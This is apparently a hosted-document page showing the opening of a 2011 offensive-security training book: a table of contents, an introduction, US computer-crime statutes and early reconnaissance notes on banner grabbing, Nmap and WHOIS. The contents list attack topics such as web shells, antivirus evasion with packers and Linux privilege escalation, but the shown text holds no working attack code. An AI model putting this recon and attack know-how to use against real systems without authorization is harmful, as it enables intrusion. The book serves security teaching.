This document provides an overview of web and desktop application security topics such as cross-site scripting (XSS), SQL injection, cross-site request forgery (CSRF), and more. It discusses the risks and techniques associated with each topic, including how to perform security testing through black box, gray box, and white box penetration testing methods. The document also provides prevention recommendations such as request validation, whitelist input filtering, and secure coding practices.
HijackLoader Evolution: Interactive Process HollowingDonato Onofri
CrowdStrike researchers have identified a HijackLoader (aka IDAT Loader) sample that employs sophisticated evasion techniques to enhance the complexity of the threat. HijackLoader, an increasingly popular tool among adversaries for deploying additional payloads and tooling, continues to evolve as its developers experiment and enhance its capabilities.
In their analysis of a recent HijackLoader sample, CrowdStrike researchers discovered new techniques designed to increase the defense evasion capabilities of the loader. The malware developer used a standard process hollowing technique coupled with an additional trigger that was activated by the parent process writing to a pipe. This new approach, called "Interactive Process Hollowing", has the potential to make defense evasion stealthier.
Honeypots Unveiled: Proactive Defense Tactics for Cyber Security, Phoenix Sum...APNIC
Adli Wahid, Senior Internet Security Specialist at APNIC, delivered a presentation titled 'Honeypots Unveiled: Proactive Defense Tactics for Cyber Security' at the Phoenix Summit held in Dhaka, Bangladesh from 23 to 24 May 2024.
Securing BGP: Operational Strategies and Best Practices for Network Defenders...APNIC
Md. Zobair Khan,
Network Analyst and Technical Trainer at APNIC, presented 'Securing BGP: Operational Strategies and Best Practices for Network Defenders' at the Phoenix Summit held in Dhaka, Bangladesh from 23 to 24 May 2024.
1. HACKER
TECHNIQUES,
EXPLOIT AND
INCIDENT
HANDELING
D e f e n s i a
2 0 1 1
Rafel Ivgi
This book introduces the world of hacking and involves
the reader with the current players, the rules of the
game, motivation and new trends.
2. 1 | P a g e
TABLE OF CONTENTS
Introduction to Ethical Hacking Problem Definition – Why? ........................................................ 11
How does a hacker see the world? ........................................................................................... 11
Hacking - Laws www.usdoj.gov..................................................................................................... 12
United States of America: Securely Protect Yourself against - Cyber Trespass Act (SPY ACT). 12
U.S. Federal Laws....................................................................................................................... 13
Section 1029.......................................................................................................................... 13
Section 1030.......................................................................................................................... 14
18 U.S.C. §1362...................................................................................................................... 17
18 U.S.C. §2318 - Trafficking in counterfeit…........................................................................ 18
18 U.S.C. §2320 - Trademark Offenses Trafficking in counterfeit goods or services ............ 18
18 U.S.C. §1831 - Trade Secret Offenses Economic espionage Law...................................... 18
47 U.S.C. §605 - Unauthorized publication or use of communications ................................ 18
Foot-printing visiting Reconnaissance........................................................................................... 20
Foot-Printing each Service Server Software Name and Version............................................... 20
Foot-Printing HTTP Servers.................................................................................................... 20
Foot-Printing FTP Servers...................................................................................................... 23
Foot-Printing Telnet Servers.................................................................................................. 23
Fingerprinting VoIP Servers:...................................................................................................... 24
Fingerprinting Products of Specific Vendors:............................................................................ 24
WHOIS ....................................................................................................................................... 28
Google Hacking What is Google hacking....................................................................................... 32
Finding Old Vulnerable Web Pages / Fast & Passive Web Crawling/Spidering......................... 32
Finding Login Interfaces......................................................................................................... 33
Finding Exploitable Vulnerable Web Systems by Signature...................................................... 34
Choosing a public exploit:...................................................................................................... 34
Finding the a vulnerable website .......................................................................................... 35
Verifying the vulnerability exists........................................................................................... 37
Exploiting the Vulnerability ................................................................................................... 38
Opening a free hosting account ............................................................................................ 38
Finding Cameras........................................................................................................................ 41
Finding Password Files............................................................................................................... 43
3. 2 | P a g e
Scanning and Scanning Definition................................................................................................. 46
Enumeration Overview of System Hacking Cycle.......................................................................... 48
Enumerating the allowed HTTP Methods on a Web Server:..................................................... 48
Enumerating Usernames Using Google..................................................................................... 49
Exposed Configuration Files .................................................................................................. 49
Company Email Addresses: ................................................................................................... 50
SMTP Enumeration (VRFY, EXPN, RCPT TO, NDR)..................................................................... 51
Using the SMTP VRFY Command........................................................................................... 51
Using the SMTP EXPN Command .......................................................................................... 52
Using the SMTP RCPT TO Command ..................................................................................... 53
Non Delivery Response (NDR)............................................................................................... 54
POP3 Enumeration .................................................................................................................... 54
Private User Directories............................................................................................................. 56
Apache User Enumeration..................................................................................................... 56
WordPress Authors Template User Enumeration Vulnerability ........................................... 56
FTP............................................................................................................................................. 58
CWD Username Enumeration Vulnerability (Example: Solaris in.ftpd) ................................ 58
FTP Server Authentication Delay Username Enumeration Vulnerability (Example: ProFTPD)
............................................................................................................................................... 58
Telnet......................................................................................................................................... 58
Telnet Server User Field Account Enumeration (Example: Cisco Aironet)............................ 58
Web Server Pre-Login – HTTP Response based enumeration (Example: Lotus Domini) .......... 58
Error Message User Enumeration:............................................................................................ 59
NetBIOS User Enumeration....................................................................................................... 59
Mcafee FoundStone SuperScan 4: ........................................................................................ 61
NetBIOS Enumerator............................................................................................................. 62
GFI Languard.......................................................................................................................... 63
SNMP Enumeration................................................................................................................... 63
DNS Enumeration...................................................................................................................... 64
Dictionary Based DNS Enumeration...................................................................................... 65
Brute Forcing DNS Sub-Domains............................................................................................... 65
VoIP User Enumeration ............................................................................................................. 66
4. 3 | P a g e
Enumerating Extensions:....................................................................................................... 66
Enumerate Usernames: (Example: Inter Asterisk Exchange protocol) ................................. 66
Citrix Published Applications Remote Enumeration ................................................................. 67
System Hacking Part 1- Cracking Password................................................................................... 69
Brute Forcing Passwords – Telnet:............................................................................................ 69
Cracking Accounts Using Hydra................................................................................................. 69
Cracking Accounts Using Medusa: ............................................................................................ 70
Brute Forcing Check Point Client Authentication Remote Service............................................ 71
Brute Forcing Citrix ICA Servers................................................................................................. 71
Trojans and Backdoors Effect on Business.................................................................................... 76
Auto Dialers............................................................................................................................... 77
FraudWare................................................................................................................................. 77
Keylogger................................................................................................................................... 78
Spyware & Browser Trojans ...................................................................................................... 79
Trojans....................................................................................................................................... 79
Password Stealers...................................................................................................................... 79
RansomWare............................................................................................................................. 80
Viruses and Worms Virus History.................................................................................................. 82
Local Replicating Viruses ........................................................................................................... 82
Worms....................................................................................................................................... 83
Antivirus..................................................................................................................................... 83
Packers/Crypters – Bypassing Anti-Viruses............................................................................... 84
Netcat - Original – Less Then Packed .................................................................................... 85
Netcat * RDG PolyPack v1.1 .................................................................................................. 88
Poison Ivy............................................................................................................................... 89
SCPack 1.1.............................................................................................................................. 89
Alternate EXE Packer............................................................................................................. 91
Alternate EXE Packer............................................................................................................. 92
Poison Ivy * MEW.................................................................................................................. 93
Poison Ivy * ACprotect .......................................................................................................... 94
sixxpack v2.2Eng.................................................................................................................... 95
DotFuscator............................................................................................................................... 95
5. 4 | P a g e
Sniffers Definition – Sniffing.......................................................................................................... 98
Man in the Middle..................................................................................................................... 98
Hub vs. Switch ........................................................................................................................... 98
MAC Spoofing............................................................................................................................ 99
MAC Flooding / CAM Table Overflow...................................................................................... 100
Description .......................................................................................................................... 100
MAC Flooding ...................................................................................................................... 100
Port Stealing ............................................................................................................................ 102
STP mangling ........................................................................................................................... 104
Address Resolution Protocol (ARP) Spoofing .......................................................................... 104
IP Spoofing............................................................................................................................... 105
VLANS ...................................................................................................................................... 106
ICMP Redirect.......................................................................................................................... 107
Public Key Exchanging ............................................................................................................. 109
Command Injection ................................................................................................................. 110
Malicious Code Injection......................................................................................................... 110
Downgrade Attacks - SSH V2 to V1 ......................................................................................... 110
Downgrade Attacks - SSH V2 to V1...................................................................................... 110
Downgrade Attacks - IPSEC Failure ......................................................................................... 110
Downgrade Attacks – PPTP ..................................................................................................... 111
PPTP:.................................................................................................................................... 111
Social Engineering ....................................................................................................................... 112
Email Spoofing......................................................................................................................... 112
Social Engineering Tool-Kit...................................................................................................... 114
Tab-Nabbing ............................................................................................................................ 119
ClickJacking / Interface Spoofing............................................................................................. 119
Phishing ....................................................................................................................................... 121
Diversion theft......................................................................................................................... 121
Quid pro quo ........................................................................................................................... 122
Social Engineering - Source Validation.................................................................................... 122
Pretexting – Collecting Names, Emails & Phone Numbers ..................................................... 123
Pretexting – Collecting Names & Roles ................................................................................... 124
6. 5 | P a g e
Target and Attack .................................................................................................................... 125
Social Engineering by Phone ................................................................................................... 126
Dumpster Diving...................................................................................................................... 127
On-Line Social Engineering...................................................................................................... 127
Persuasion ............................................................................................................................... 128
Reverse Social Engineering...................................................................................................... 129
Hacking Email Accounts............................................................................................................... 130
Key-logging: The Easiest Way! ................................................................................................ 130
Phishing: The Difficult Way ..................................................................................................... 130
Common Myths and Scams Associated with Email Hacking ................................................... 130
Denial-of-Service Real World Scenario of D.o.S Attacks ............................................................. 132
Ping of Death........................................................................................................................... 132
Permanent denial-of-service attacks – PDOS.......................................................................... 132
IP Spoofing............................................................................................................................... 133
Land Attack.............................................................................................................................. 133
SYN Flood................................................................................................................................. 134
SYN Flood + IP Spoofing........................................................................................................... 136
Reflected attack: Source IP Spoofing + SYN Sent .................................................................... 137
Distributed attack – DDOS....................................................................................................... 138
Amplification/Smurf attack ..................................................................................................... 140
Session Hi-Jacking - What is Session Hi-Jacking?......................................................................... 142
Hacking Web Servers How Web Servers Work ........................................................................... 148
Components of a generic web application system ................................................................. 148
URL mappings to the web application system ........................................................................ 149
Flowchart for a one-way web hack ......................................................................................... 150
Finding the entry point............................................................................................................ 151
Exploiting poorly validated input parameters..................................................................... 152
Exploiting SQL injection....................................................................................................... 152
Invoking the command interpreter..................................................................................... 153
Posting commands to CMD.EXE .......................................................................................... 153
Posting commands to /bin/sh ............................................................................................. 154
Automating the POST process............................................................................................. 155
7. 6 | P a g e
Output of post_cmd.pl ........................................................................................................ 155
Web based command prompt............................................................................................. 157
Perl - perl_shell.cgi .............................................................................................................. 157
ASP - cmdasp.asp................................................................................................................. 158
PHP - sys.php....................................................................................................................... 160
JSP - cmdexec.jsp................................................................................................................. 160
Installing the Web based command prompt....................................................................... 161
Re-creating arbitrary binary files......................................................................................... 162
File uploader............................................................................................................................ 162
ASP - upload.asp and upload.inc ......................................................................................... 162
Perl - upload.cgi................................................................................................................... 163
PHP - upload.php................................................................................................................. 164
One-Way Privilege Escalation.................................................................................................. 165
Web Application Vulnerabilities Web Application Setup............................................................ 169
XSS – Cross-Site-Scripting........................................................................................................ 169
Introduction......................................................................................................................... 169
Reflected XSS (Type I).......................................................................................................... 169
Permanent (Stored) XSS ...................................................................................................... 170
DOM XSS.............................................................................................................................. 170
XSS-Shell .............................................................................................................................. 170
XSS Worms........................................................................................................................... 171
The Future of SPAM............................................................................................................. 171
D.o.S attacks........................................................................................................................ 172
Information Gathering......................................................................................................... 173
Automated exploiting bots.................................................................................................. 173
Malware Script Detector ..................................................................................................... 174
Cross Site Request Forgery (CSRF/XSRF/Session Riding)......................................................... 174
Introduction......................................................................................................................... 174
The risks and common uses ................................................................................................ 175
Tokens vs. Personal Information as a solution for CSRF ..................................................... 176
Open/Un-Validated Site Redirection / Cross Domain Redirect............................................... 177
Common uses and Risks ...................................................................................................... 178
8. 7 | P a g e
Validating Redirects and Forwards...................................................................................... 179
SQL-injection - What is SQL Injection? ........................................................................................ 180
Introduction............................................................................................................................. 180
The Practice............................................................................................................................. 181
Error Based SQL Injection.................................................................................................... 181
Union Based SQL Injection .................................................................................................. 181
Taking Over the Machine .................................................................................................... 182
SQL injection as a lead to other vulnerabilities....................................................................... 183
SQL injection Automated tools................................................................................................ 183
SQL injection Prevention......................................................................................................... 185
Web-Based Password Cracking Techniques Authentication – Definition.................................. 186
Hacking Wireless Networks......................................................................................................... 193
Introduction............................................................................................................................. 193
Wireless LAN Overview ........................................................................................................... 193
Stations and Access Points .................................................................................................. 194
Channels .............................................................................................................................. 194
WEP ..................................................................................................................................... 194
Infrastructure and Ad Hoc Modes....................................................................................... 194
Frames................................................................................................................................. 195
Authentication..................................................................................................................... 195
Association .......................................................................................................................... 196
Wireless Network Sniffing....................................................................................................... 197
Passive Scanning.................................................................................................................. 197
Detection of SSID................................................................................................................. 198
Collecting the MAC Addresses............................................................................................. 198
Collecting the Frames for Cracking WEP ............................................................................. 199
Detection of the Sniffers ..................................................................................................... 200
Wireless Spoofing.................................................................................................................... 200
MAC Address Spoofing........................................................................................................ 200
IP spoofing........................................................................................................................... 200
Frame Spoofing.................................................................................................................... 201
Wireless Network Probing....................................................................................................... 201
9. 8 | P a g e
Detection of SSID................................................................................................................. 202
Detection of Probing ........................................................................................................... 202
AP Weaknesses........................................................................................................................ 202
Configuration....................................................................................................................... 203
Defeating MAC Filtering ...................................................................................................... 203
Rogue AP ............................................................................................................................. 203
Trojan AP ............................................................................................................................. 203
Equipment Flaws ................................................................................................................. 203
Denial of Service...................................................................................................................... 204
Jamming the Air Waves....................................................................................................... 204
Flooding with Associations.................................................................................................. 204
Forged Dissociation ............................................................................................................. 205
Forged De-Authentication................................................................................................... 205
Power Saving ....................................................................................................................... 205
Man-in-the-Middle Attacks ..................................................................................................... 205
Wireless MITM .................................................................................................................... 206
ARP Poisoning...................................................................................................................... 206
Session Hijacking ................................................................................................................. 207
War Driving.............................................................................................................................. 207
War chalking........................................................................................................................ 208
Typical Equipment............................................................................................................... 208
Wireless Security Best Practices.............................................................................................. 209
Location of the APs.............................................................................................................. 209
Proper Configuration........................................................................................................... 209
Secure Protocols.................................................................................................................. 210
Wireless IDS......................................................................................................................... 210
Wireless Auditing................................................................................................................. 211
Newer Standards and Protocols.......................................................................................... 211
Software Tools..................................................................................................................... 211
Conclusion ............................................................................................................................... 212
Physical Security.......................................................................................................................... 213
Dumpster diving ...................................................................................................................... 213
10. 9 | P a g e
Overt document stealing......................................................................................................... 213
CRT vs. LCD vs. LED – Remote Screen Eavesdropping............................................................. 213
Ethernet vs. Optic Fibers ......................................................................................................... 214
Linux Hacking - Why Linux?......................................................................................................... 217
Linux/Apache privilege escalation........................................................................................... 217
Uploading the UNIX attack tools............................................................................................. 217
ptrace1.c.............................................................................................................................. 217
Evading IDS, Firewalls and Detecting Honey Pots Introduction to Intrusion.............................. 223
Introduction............................................................................................................................. 223
Honeypots versus steganography ........................................................................................... 223
Tools .................................................................................................................................... 224
User Mode Linux (UML)....................................................................................................... 224
VMware ............................................................................................................................... 227
Detecting additional lines of defense: chroot and jails....................................................... 229
Practical examples (continued) ............................................................................................... 230
Sebek-based Honeypots...................................................................................................... 230
Snort_inline ......................................................................................................................... 231
Fake AP ................................................................................................................................ 232
Bait and Switch Honeypots.................................................................................................. 232
Summary.................................................................................................................................. 233
Conclusion ............................................................................................................................... 234
Buffer Overflows Why is Programs/Applications Vulnerable?.................................................... 235
Verify the bug.......................................................................................................................... 235
Verify the bug – and see if it could be interesting .................................................................. 236
Before we proceed – some theory.......................................................................................... 236
Process Memory.................................................................................................................. 237
The Stack ............................................................................................................................. 239
The debugger....................................................................................................................... 247
Determining the buffer size to write exactly into EIP ......................................................... 251
Find memory space to host the shellcode .......................................................................... 255
Jump to the shellcode in a reliable way .................................................................................. 258
Get shellcode and finalize the exploit ..................................................................................... 263
11. 10 | P a g e
What if you want to do something else than launching calc? ................................................ 265
Heap Overflows....................................................................................................................... 270
Exploiting Heap Overflows .................................................................................................. 271
Off-By-One............................................................................................................................... 275
Signed vs. Un-Signed ............................................................................................................... 275
Memory Protection Mechanisms............................................................................................ 276
Security Cookie (Canary) ..................................................................................................... 276
SafeSEH................................................................................................................................ 277
Address Space Layout Randomization (ASLR) ..................................................................... 278
NX (No eXecute – Hardware DEP)....................................................................................... 279
NX – In Sun VM Environment.............................................................................................. 280
NX – Process Support .......................................................................................................... 281
Cryptography............................................................................................................................... 282
Hash......................................................................................................................................... 282
MD5 HASH “Reverse”.............................................................................................................. 282
Rainbow Tables ....................................................................................................................... 284
12. 11 | P a g e
Introduction to Ethical Hacking Problem Definition – Why?
In the past, hackers were kids who hacked in order to prove themselves as the smartest
community and the best technologists. After they succeeded in remotely penetrating into the
organization and gained control over an organization’s machine, they would usually stop there
and keep the vulnerability information for themselves or within their close community circle.
Today, Hackers are people at all ages, motivated mostly by money. Where in past times a White-
Hat hacker known as a “Security Researcher” would publish an information security advisory for
free, to make himself a reputation and create new career opportunities, today those security
vulnerabilities are worth tens of thousands of dollars and are sold to private companies.
In resemblance to the hacking scene, the cracking scene has also changed, where in the past the
cracking scene was compiled of a few famous group such as Myth, Fair-Light, Divine, Deviance,
Paradigm which were mostly collections of teenagers interested in software piracy, who
believed in creating “a money free world where all computer games and software are available
to the rich and the poor”. Today, the cracking scene has shrunk to its core and most of the crack
download portals are driven by organized crime which deliberately provides free software
cracks with a Trojan downloader, creating computerized armies controlled by a botnet.
How does a hacker see the world?
The world’s computer industries work to provide solutions to the needs of normal users. The
solution begins with an initiative/startup venture which is designed by the Chief Architect and
passed down the chain to a product manager which defines the user needs and the optimal user
experience, down to a software developer who implements the defined requirements in
practice. It is important to remember that all of the people in this chain are normal people, who
have a unified mission: creating a specific solution for a user/organization.
A true hacker, is not a user and is not just a developer, not just an architect, he is all of them
when it regards to the system’s security. The hacker reviews the system and inspects the way
the information flows between each level of the system as a whole, from the application level all
the way down to the bits leaving the machine’s network interface. For the hacker, the graphical
user interface is just a mask for the underlying truth to discover by using hacking tools.
A system could run on production for years and be used by thousands of normal and advanced
users without noticing an obvious security flaw that a hacker can pick up in just a few minutes,
that is why a system that wasn’t approved for used by a hacker, is not safe from one.
13. 12 | P a g e
Hacking - Laws www.usdoj.gov
United States of America:
Securely Protect Yourself against - Cyber Trespass Act (SPY ACT)
SEC. 2. PROHIBITION OF [UNFAIR OR] DECEPTIVE ACTS OR PRACTICES RELATING TO SPYWARE.
(a) Prohibition- It is unlawful for any person, who is not the owner or authorized user of a
protected computer, to engage in unfair or deceptive acts or practices that involve any
of the following conduct with respect to the protected computer:
(1) Taking control of the computer by:
(a) Utilizing a computer to send unsolicited information or material from the
computers to other computers
(B) Diverting the Internet browser of the computer, or similar program of the
computer used to access and navigate the Internet:
(i) Without authorization of the owner or authorized user of the
computer; and
(ii) away from the site the user intended to view, to one or more other
Web pages, such that the user is prevented from viewing the content at
the intended web page, unless such diversion it otherwise authorized.
(C) accessing, hijacking, or otherwise using the modem, or Internet connection
or service, for the computer and thereby causing damage to the computer or
causing the owner or authorized user or a third party defrauded by such
conduct to incur charges or other costs for a service that is not authorized by
such owner or authorized user;
(E) Delivering advertisements that a user of the computer cannot close without
undue effort or knowledge by the user or without turning off the computer or
closing all sessions of the Internet browser for the computer.
– (2) Modifying settings related to use of the computer or to the computer's
access to or use of the Internet by altering:
– (A) the Web page that appears when the owner or authorized user
launches an Internet browser or similar program used to access and
navigate the Internet;
– (B) the default provider used to access or search the Internet, or other
existing Internet connections settings;
14. 13 | P a g e
– (3) Collecting personally identifiable information through the use of a
keystroke logging function
- (4) Inducing the owner or authorized user of a computer to disclose personally
identifiable information by means of a webpage that:
- (A) is substantially similar to a Web page established or provided by
another person; and
- (b) misleads the owner or authorized user that such Web page is
provided by such other person
U.S. Federal Laws
• 18 U.S.C §1029. Fraud and Related Activity in Connection with Access Devices
• 18 U.S.C §1030. Fraud and Related Activity in Connection with Computers
• 18 U.S.C §1362. Communication Lines, Stations, or Systems
• 18 U.S.C §2510. et seq. Wire and Electronic Communications Interception and
Interception of Oral Communications
• 18 U.S.C §2701 et seq. Stored Wire and Electronic Communications and Transactional
Records Access
Section 1029
Subsection (a) who will:
(1) Knowingly and with intent to defraud produces, uses, or traffics in one or more
counterfeit access devices;
(2) knowingly and with intent to defraud traffics in or uses one or more unauthorized
access devices during any one-year period, and by such conduct obtains anything of
value aggregating $1,000 or more during that period;
(3) Knowingly and with intent to defraud possesses fifteen or more devices which are
counterfeit or unauthorized access devices;
(4) Knowingly, and with intent to defraud, produces, traffics in, has control or custody
of, or possesses device-making equipment;
(5) knowingly and with intent to defraud effects transactions, with 1 or more access
devices issued to another person or persons, to receive payment or any other thing of
value during any 1-year period the aggregate value of which is equal to or greater than
$1,000;
(6) Without the authorization of the issuer of the access device, knowingly and with
intent to defraud solicits a person for the purpose of:
15. 14 | P a g e
(A) Offering an access device; or
(B) Selling information regarding or an application to obtain an access device;
(7) Knowingly and with intent to defraud uses, produces, traffics in, has control or
custody of, or possesses a telecommunications instrument that has been modified or
altered to obtain unauthorized use of telecommunications services;
(8) Knowingly and with intent to defraud uses, produces, traffics in, has control or
custody of, or possesses a scanning receiver;
(9) Knowingly uses, produces, traffics in, has control or custody of, or possesses
hardware or software, knowing it has been configured to insert or modify
telecommunication identifying information associated with or contained in a
telecommunications instrument so that such instrument may be used to obtain
telecommunications service without authorization; or
(10) Without the authorization of the credit card system member or its agent, knowingly
and with intent to defraud causes or arranges for another person to present to the
member or its agent, for payment, 1 or more evidences or records of transactions made
by an access device.
The Punishments:
(A) In the case of an offense that does not occur after a conviction for another offense
under this section:
(i) If the offense is under paragraph (1), (2), (3), (6), (7), or (10) of subsection (a),
a fine under this title or imprisonment for not more than 10 years, or both; and
(ii) If the offense is under paragraph (4), (5), (8), or (9) of subsection (a), a fine
under this title or imprisonment for not more than 15 years, or both;
(B) in the case of an offense that occurs after a conviction for another offense under this
section, a fine under this title or imprisonment for not more than 20 years, or both; and
(C) in either case, forfeiture to the United States of any personal property used or
intended to be used to commit the offense
Section 1030
Subsection (1): having knowingly accessed a computer without authorization or exceeding
authorized access, and by means of such conduct having obtained information that has been
determined by the United States Government pursuant to an Executive order or statute to
require protection against unauthorized disclosure for reasons of national defense or foreign
16. 15 | P a g e
relations, or any restricted data, as defined in paragraph y of section 11 of the Atomic Energy
Act of 1954, with reason to believe that such information so obtained could be used to the
injury of the United States, or to the advantage of any foreign nation willfully communicates,
delivers, transmits, or causes to be communicated, delivered, or transmitted, or attempts to
communicate, deliver, transmit or cause to be communicated, delivered, or transmitted the
same to any person not entitled to receive it, or willfully retains the same and fails to deliver it
to the officer or employee of the United States entitled to receive it;
(2) (A) (B) (C):
(2) Intentionally accesses a computer without authorization or exceeds authorized
access, and thereby obtains:
(A) information contained in a financial record of a financial institution, or of a
card issuer as defined in section 1602(n) of title 15, or contained in a file of a
consumer reporting agency on a consumer, as such terms are defined in the Fair
Credit Reporting Act (15 U.S.C. 1681 et seq.);
(B) Information from any department or agency of the United States; or
(C) Information from any protected computer if the conduct involved an
interstate or foreign communication;
(3) intentionally, without authorization to access any nonpublic computer of a
department or agency of the United States, accesses such a computer of that
department or agency that is exclusively for the use of the Government of the United
States or, in the case of a computer not exclusively for such use, is used by or for the
Government of the United States and such conduct affects that use by or for the
Government of the United States;
(4) knowingly and with intent to defraud, accesses a protected computer without
authorization, or exceeds authorized access, and by means of such conduct furthers the
intended fraud and obtains anything of value, unless the object of the fraud and the
thing obtained consists only of the use of the computer and the value of such use is not
more than $5,000 in any 1-year period;
(5)(A)(i) Knowingly causes the transmission of a program, information, code, or
command, and as a result of such conduct, intentionally causes damage without
authorization, to a protected computer
(ii) intentionally accesses a protected computer without authorization, and as a
result of such conduct, recklessly causes damage; or
(iii) Intentionally access a protected computer without authorization, and as a
result of such conduct, causes damage; and
17. 16 | P a g e
(5)(B) By conduct described in clause (i), (ii), or (iii) of subparagraph (A), caused (or, in
the case of an attempted offense, would, if completed, have caused):
(i) loss to 1 or more persons during any 1-year period (and, for purposes of an
investigation, prosecution, or other proceeding brought by the United States
only, loss resulting from a related course of conduct affecting 1 or more other
protected computers) aggregating at least $5,000 in value;
(ii) The modification or impairment, or potential modification or impairment, of
the medical examination, diagnosis, treatment, or care of 1 or more individuals;
(iii) physical injury to any person;
(iv) a threat to public health or safety; or
(v) damage affecting a computer system used by or for a government entity in
furtherance of the administration of justice, national defense, or national
security;
(6) Knowingly and with intent to defraud traffics (as defined in section 1029) in any
password or similar information through which a computer may be accessed without
authorization, if:
(A) Such trafficking affects interstate or foreign commerce; or
(B) such computer is used by or for the Government of the United States;
(7) With intent to extort from any person any money or other thing of value, transmits
in interstate or foreign commerce any communication containing any threat to cause
damage to a protected computer;
The Punishments:
(1)(A) a fine under this title or imprisonment for not more than ten years, or both, in the
case of an offense under subsection (a)(1) of this section which does not occur after a
conviction for another offense under this section, or an attempt to commit an offense
punishable under this subparagraph; and
(B) a fine under this title or imprisonment for not more than twenty years, or both, in
the case of an offense under subsection (a)(1) of this section which occurs after a
conviction for another offense under this section, or an attempt to commit an offense
punishable under this subparagraph;
(2)(A) except as provided in subparagraph (B), a fine under this title or imprisonment for
not more than one year, or both, in the case of an offense under subsection (a)(2),
(a)(3), (a)(5)(A)(iii), or (a)(6) of this section which does not occur after a conviction for
18. 17 | P a g e
another offense under this section, or an attempt to commit an offense punishable
under this subparagraph;
(B) a fine under this title or imprisonment for not more than 5 years, or both, in the case
of an offense under subsection (a)(2), or an attempt to commit an offense punishable
under this subparagraph, if:
• (i) the offense was committed for purposes of commercial advantage or
private financial gain;
• (ii) The offense was committed in furtherance of any criminal or tortuous act
in violation of the Constitution or laws of the United States or of any State; or
• (iii) The value of the information obtained exceeds $5,000;
(C) a fine under this title or imprisonment for not more than ten years, or both, in the
case of an offense under subsection (a)(2), (a)(3) or (a)(6) of this section which occurs
after a conviction for another offense under this section, or an attempt to commit an
offense punishable under this subparagraph;
(3)(A) a fine under this title or imprisonment for not more than five years, or both, in the
case of an offense under subsection (a)(4) or (a)(7) of this section which does not occur
after a conviction for another offense under this section, or an attempt to commit an
offense punishable under this subparagraph; and (3)(B) a fine under this title or
imprisonment for not more than ten years, or both, in the case of an offense under
subsection (a)(4), (a)(5)(A)(iii), or (a)(7) of this section which occurs after a conviction for
another offense under this section, or an attempt to commit an offense punishable
under this subparagraph; and
18 U.S.C. §1362
This law applies when:
• Person willfully injures or destroys any of the works, property, or material of any
means of communication
• Maliciously obstructs, hinders, or delays the transmission of any communication
Punishment:
• A fine or imprisonment for not more than 10 years, or both
19. 18 | P a g e
18 U.S.C. §2318 - Trafficking in counterfeit…
Label for phone records, copies of computer programs or computer program documentation or
packaging, and copies of motion pictures or other audio visual works, and trafficking in
counterfeit computer program documentation or packaging
This law applies when:
• Person knowingly traffics in a counterfeit label affixed or designed to be affixed
• Intentionally traffics in counterfeit documentation or packaging for a computer
program
Punishment:
• A financial fine or imprisoned for not more than five years both
18 U.S.C. §2320 - Trademark Offenses Trafficking in counterfeit goods or services
This law applies when:
• Person intentionally traffics or attempts to traffic in goods or services
• Knowingly uses a counterfeit mark
Punishment:
• A financial fine of not more than $2,000,000 or imprisoned not more than 10 years, or
both
18 U.S.C. §1831 - Trade Secret Offenses Economic espionage Law
This law applies when:
• Person knowingly steals or without authorization obtains a trade secret
• Without authorization copies or transmits a trade secret
• Receives, buys, or possesses a trade secret
Punishment:
• A financial fine of not more than $10,000,000
47 U.S.C. §605 - Unauthorized publication or use of communications
This law applies when:
20. 19 | P a g e
• Receiving, assisting in receiving, transmitting, or assisting in transmitting, any
interstate or foreign communication by wire or radio
• Intercepting any radio communication and divulging or publishing the existence,
contents, substance, purport, effect, or meaning of such intercepted communication
to any person
• Scrambling of Public Broadcasting Service programming
Punishment:
• A financial fine of not more than $2,000 or imprisoned for not more than 6 months, or
both
More US Laws:
• Federal Managers Financial Integrity Act of 1982
• The Freedom of Information Act [5 U.S.C.§552]
• Federal Information Security Management Act (FISMA)
• The Privacy Act Of 1974 [5 U.S.C.§552a]
• USA Patriot Act of 2001
• Government Paperwork Elimination Act (GPEA)
European Union:
• SUBSTANTIVE CRIMINAL LAW
o Offences against the confidentiality, integrity and availability of computer data
and systems
o illegal Access: Each Party shall adopt such legislative and other measures as may
be necessary to establish as criminal offences under its domestic law, when
committed intentionally, the access to the whole or any part of a computer
system without right
o Illegal Interception
o Data Interference
UK:
• Computer Misuse Act 1990
• Police and Justice Act 2006
21. 20 | P a g e
Foot-printing visiting Reconnaissance
Reconnaissance is the step where the attacker attempts to retrieve as much information as
possible on the target. Reconnaissance is truly an art and is one of the most important stages of
the attack process. It is the eyes of the hacker on the hacking court and without it he must
attack blindly, minimizing the odds of success to its minimum.
Foot-Printing each Service Server Software Name and Version
Foot-Printing HTTP Servers
Getting the server type and disclosing internal information such as the local machine’s internal name, internal IP, usage of
a proxy or a reverse proxy and etc…
The following error page reveals that the server is Apache Tomcat, the Machine’s internal name and that the error source
was the proxy component:
The following reveals the server’s type and its exact version:
22. 21 | P a g e
It is possible to change the values of the request parameters, retrieve application errors and
determine the operating system and the local path of the website root folder:
It is possible to identify the server type, the development platform, and installed plugins by
inspecting the returned HTTP headers and the supported HTTP Methods.
24. 23 | P a g e
Foot-Printing FTP Servers
The server’s banner header, which contains the server name and version, is exposed by default on most File Transfer
Protocol (FTP) servers. This means that all that an attacker is required to do is connect to the server and analyze the first
non-empty line of text. For Example:
220-Serv-U FTP Server v6.4 for WinSock ready...
220-Welcome to XXXXX, home of Your FTP Server
220-
220 Local time is 13:36:08,
Foot-Printing Telnet Servers
Some telnet servers have banners revealing the name of the vendor, organization or product:
25. 24 | P a g e
Some servers have a scary warning message which may be used to identify the product or
remotely identify that several machines belong to the same organization. For Example:
Fingerprinting VoIP Servers:
One of the most VoIP security assessment toolkits is called SIP-Vicious.
Fingerprinting Products of Specific Vendors:
It is possible to identify specific vendors by common texts or messages used by that vendor for
title, errors and authentication requests. For example, a web server with “Basic Authentication”
on practically every cisco product will have the message “level_15_access”, by default:
26. 25 | P a g e
Using ZenMap (Nmap GUI) to fingerprint the exact type and product version:
Scanning for “listening on TCP port 990, finds a Brute-Force-able Check Point Firewall VPN:
27. 26 | P a g e
On some implementations it is reconfigured to listen on port 80:
Scanning for “Check Point Certificate Services” listening on TCP port 18264 has always proved
itself for finding Check-Point firewalls:
29. 28 | P a g e
Identifying Check Point VPN-1 Edge Portal
WHOIS
Any IP and Domain on internet are registered to someone. It is possible to query the public
databases and retrieve information about the owner of an IP or Domain. Querying IPs is mostly
called “IP WHOIS” or “Inet-WHOIS” and querying domain names is called “Domain WHOIS” or
“Inic-WHOIS”.
An attacker is able to retrieve network information with an information gathering tools such as
Dmitry:
30. 29 | P a g e
Where Inic-WHOIS might be masked/private/proxied/censored:
The Inet-WHOIS might not be:
31. 30 | P a g e
Or by using a free public online service such as:
http://www.dnsstuff.com
http://www.dnstools.com
http://www.centralops.net
For Example:
